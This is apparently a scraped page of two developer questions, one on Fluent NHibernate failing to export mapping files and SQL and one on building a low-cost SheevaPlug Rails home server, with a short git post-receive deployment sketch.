    Hello, I am trying to get Fluent NHibernate to generate its mappings so I can look at the files and the SQL. My code is based on this post and on what I can glean from the documentation: http://stackoverflow.com/questions/1375146/fluent-mapping-entities-and-classmaps-in-different-assemblies. I am using the latest code from git. Here's my config code:

        Configuration cfg = new Configuration();
        var ft = Fluently.Configure(cfg);

        // DbConnection by fluent
        ft.Database(
            MsSqlConfiguration
                .MsSql2008
                .ConnectionString("……")
                .ShowSql()
                .UseReflectionOptimizer()
        );

        // get mapping files
        ft.Mappings(m =>
        {
            // set up the mapping locations
            m.FluentMappings.AddFromAssemblyOf<Entity>()
                .ExportTo(@"C:\temp");
            m.Apply(cfg);
        });

    I also tried:

        var sessionFactory = Fluently.Configure()
            .Database(MsSqlConfiguration
                .MsSql2008
                .ShowSql()
                .ConnectionString("……"))
            .Mappings(p => p.FluentMappings
                .AddFromAssemblyOf<Entity>()
                .ExportTo(@"c:\temp\"))
            .BuildSessionFactory();

    I have verified that the connection string is correct. The issue is that no mapping files show up in the ExportTo folder, and no SQL shows up in the output window or in the log file. No errors or exceptions are generated either. I have no idea where to go from here. Thank you in advance. Rick

    Read the article

  • rails + sheevaplug = rails home development server and more

    - by microspino
    Hello, I'd like to build a "Rails brick" using a SheevaPlug from Marvell (the OS is Ubuntu out of the box, but you can install other distributions on it). It would be a home server and a silent, low-cost ($99), low-energy development machine. I'd like to add Rails via RVM, lots of gems, git-based Heroku-like deployment, and Passenger + nginx. This way I could have a portable server with a complete development environment; maybe I could find a hosting company willing to co-locate a grid of these devices, or I could sell it as a simple little server for offices of 10 or fewer users, with some centralized Rails services (I'm thinking of a CMS, a blog, a wiki, a calendar, or whatever this little jewel could handle). The USB port could also make it a print server, or a UMTS link to the web via Huawei-style USB UMTS keys. Can you give me some hints: Is this project a crazy, close-to-failure idea, and why? Which gems would you include? Which Rails open source apps would you suggest? I already have an Excito Bubba server at home, and I saw the TonidoPlug, so the idea came to me to build something similar but Rails-based (Bubba is PHP-based; I don't know the TonidoPlug well, but it does not seem to be a Rails thing).
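
    On the git-based, Heroku-like deployment point, a minimal sketch of the usual bare-repo-plus-hook setup that plays well with Passenger; the app name and paths below are illustrative, not part of any particular product.

        # On the plug: a bare repository to push to.
        git init --bare /srv/myapp.git

        # Contents of /srv/myapp.git/hooks/post-receive (remember to chmod +x it):
        #!/bin/sh
        GIT_WORK_TREE=/srv/myapp git checkout -f   # check out the pushed code
        touch /srv/myapp/tmp/restart.txt           # Passenger restarts the app on this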

    Read the article
